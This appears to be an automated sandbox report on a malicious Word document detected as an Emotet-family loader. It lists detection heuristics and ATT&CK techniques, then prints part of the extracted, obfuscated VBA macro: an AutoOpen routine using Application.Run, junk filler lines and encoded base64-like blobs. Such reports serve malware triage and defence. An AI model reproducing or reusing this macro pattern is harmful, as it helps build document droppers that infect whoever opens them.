MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to execute a second-stage payload by calling Application.Run with a dynamically constructed string, likely downloading and running further malicious content. The ClamAV detection and heuristic firings strongly indicate malicious intent.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 145242 bytes |
SHA-256: 6a7512a99a913ea9fd734cf998ff3d168a3ae2f815226439690d8f342714fde8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 46 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zSCwnFfK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
dmGOs = CByte(vtQhZ)
otYWT = FPLsf
oqjRU = Cos(26532 - Oct(25179 + kdUBz * Scquf - CBool(zbwPNK)))
Application.Run aXTNl + "FCsdtDpiBrtboj" + saCqd, CUDZL + tVZimvCb + XXCBd
QMpQM = CByte(REKtmw)
QjuGq = lMVcV
CnqqmS = Cos(47253 - Oct(88816 + zYRbNK * ZOJiE - CBool(vpdRL)))
End Sub
Attribute VB_Name = "rMukUXKEaNXa"
Sub EWSLc(cGMmGT)
pusBMV = CByte(mChCo)
EDFwLr = UAkcdA
iffZoR = Cos(63193 - Oct(64863 + MZBBT * CpQXja - CBool(ANbOk)))
End Sub
Function tVZimvCb()
On Error Resume Next
CwvjTJ = CByte(pfGQQ)
dnIYt = lDKOL
vzBZnb = Cos(38210 - Oct(53010 + UwprR * iUPDDY - CBool(kKiHI)))
mIzMjl = UjcSm("nQjDj1EANAA1ADYAMgBiADMAMAA5ADMAOQBlADkAZAAzADQANwBjADUAOABkzvt", 7 + YMSfR - YMSfR, 54 + YMSfR - YMSfR)
TXrikp = CByte(MEPsf)
oMJoTh = cDjuLH
tNqrf = Cos(36447 - Oct(76818 + jcQEC * adEXXG - CBool(obWPaj)))
LcEjvr = CByte(bKnkB)
EKABqO = iEkZN
tUMzj = Cos(51868 - Oct(60895 + PGXzd * XVwmn - CBool(DwTmuc)))
wsKrzOmiJ = UjcSm("da,kADMAMQBiADIAMQA0ADEAYgAzADAAZABmADkAYgAyAGQAMAA2ADAAMwBlAGMAYwA2ADMANQA0ADEAMgBlADIANgA2ADAAYwA1AGQAZQAyADIANQAwADYANwBjADMAZAAzADDo", 6 + QnzWc - QnzWc, 129 + QnzWc - QnzWc)
oQGri = CByte(ZwBOL)
JVZpD = DMtwNI
lYSwBa = Cos(8867 - Oct(8929 + rtIPs * DXWGlf - CBool(SdHPJq)))
SsNLr = CByte(hCnwiu)
nfIJt = PqKIFH
QwvHFk = Cos(73768 - Oct(30426 + ZzCht * spsnZV - CBool(fswwF)))
dCwfb = UjcSm("ohwBmADkAOQA5AGIANwAzADgAMgBhAGYAYQBmADMAZAAyAGEAZgA4AGMAOQBiAGMAMwBlADQANQA0ADgAMABiAGUAMwA2AGEAMABmADQAYwBmADYANABhADAAZQBYp%YpUb", 3 + RpCwt - RpCwt, 122 + RpCwt - RpCwt)
iHjHD = CByte(ilHfq)
HzOGIG = sjwVQ
iTGQC = Cos(22165 - Oct(18771 + NlRpsw * KukJBo - CBool(WvZkp)))
iVuJu = CByte(NiwoYn)
nDTra = RwtrO
AziOG = Cos(8258 - Oct(28194 + ljFIBI * DunKiO - CBool(VPZVCi)))
mMpjp = UjcSm("o. myAGMANwA1ADQANwAwADIAMQBhADcAZABlAGYAZAA1AGYANgAyAGIAMwBkADQAYgBlAGIANwA2ADkAYQBlADUAZABjADAANAA3AGUAOABmADMAZgAwAGIAYwA5ADkAOAA4ADgANQAxADUAYQAzADcANwBiAGEANABhADQAjJ", 5 + MpjmSp - MpjmSp, 165 + MpjmSp - MpjmSp)
Spijsu = CByte(jUsjJJ)
EwLqSJ = BFhjD
iPolB = Cos(69083 - Oct(92539 + tacJO * UavaY - CBool(NRQOi)))
JFsFF = CByte(KktzMl)
kdRCfp = bnGjHz
jzVjK = Cos(7726 - Oct(55195 + kMsPLp * RlCOIW - CBool(QzNpfm)))
jBpwM = UjcSm("3rkANQAyAGMANgA0ADYAZAA3AGUAMwBmAGQAYgAyAGMANwBkADQAMAA2ADgANQBhAGUAMABlADAANQA1ADkAMAA3ADIAMQAzADgAYgBiADgAMAAxADEAZAAzAGIANQBjAGQAMAAwAGIAYgA0ADMANAA5AGQAO2qJU8", 3 + VUQjzA - VUQjzA, 154 + VUQjzA - VUQjzA)
zLzIT = CByte(lXQChJ)
sEJPd = uVVit
DAiXVU = Cos(46770 - Oct(80597 + lAuHr * vtUAh - CBool(VqMozL)))
nJCaO = CByte(iizEn)
OwJtXN = BuIJDj
BUPvn = Cos(81167 - Oct(5082 + FUfpRF * pQQpVW - CBool(LRasE)))
CXMINBbh = UjcSm("L1ErGEAOABhADIAOAAzADgAZQA2AGYAMwBjADUAYwBkADUANgA3ADQANAAxAGQAMgA2AGQANQA4ADcAOAAxADAAOQAxADgANABhAGQANAAzAGYAZgA4AGUAZAAwADQAYwAwADgAMABjADAAMAA2ADcAZABmADMAMgA1ADQAMgA0AGQAMgA5ADQAOQA5AGYAYQA4tj", 5 + sAihET - sAihET, 191 + sAihET - sAihET)
Rizwr = CByte(JNTERz)
WtpNhv = LEssO
wbJwU = Cos(89139 - Oct(71837 + bbUhwX * cWLzru - CBool(jWDsw)))
XtjlXR = CByte(wlllz)
LhdIaU = YNYmu
vitTww = Cos(91935 - Oct(41787 + CFfCpB * zvqHw - CBool(NjCGk)))
pqRsjnhF = UjcSm("AjhADUAYgA0ADgANwAyADUAZAA4ADAAZgA3ADIAZQBjADUAZQA0AGEAZAA5AGEAZAAzADcAMwBhAGYAMQBmAGEAZQBmADkAYQAxADkAYQA0AGQAZgA5ADEAOQBjADEANQBlAGEAMAA2ADQAOAA2AGUAZQBhADkANgA4AGMAO%bSq4", 3 + NMlHjd - NMlHjd, 166 + NMlHjd - NMlHjd)
SJUuq = CByte(WuERom)
PYiXd = iBPQd
nstQKR = Cos(80272 - Oct(26807 + DdiKoT * GEfGE - CBool(hiiLY)))
OLEqf = CByte(AJdLwH)
VDRzch = ZQOZH
jzfCb = Cos(3592 - Oct(82934 + GzOpj * uzOFGF - CBool(jzmdrk)))
BsQpVXRtmbw = UjcSm("QFYwBjADQANwA2AGMANgBmAGEAYgA0ADAAYgBlADcAYQBjADIAOQBlAGQAZQBhADYAMwBkAGUAZgAyADUAN2S8j", 3 + GODtrz - GODtrz, 81 + GODtrz - GODtrz)
iwwfiF = CByte(Cdakw)
WPGDI = iTcCJT
pwztZ = Cos(70220 - Oct(34193 + aIAjG *
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.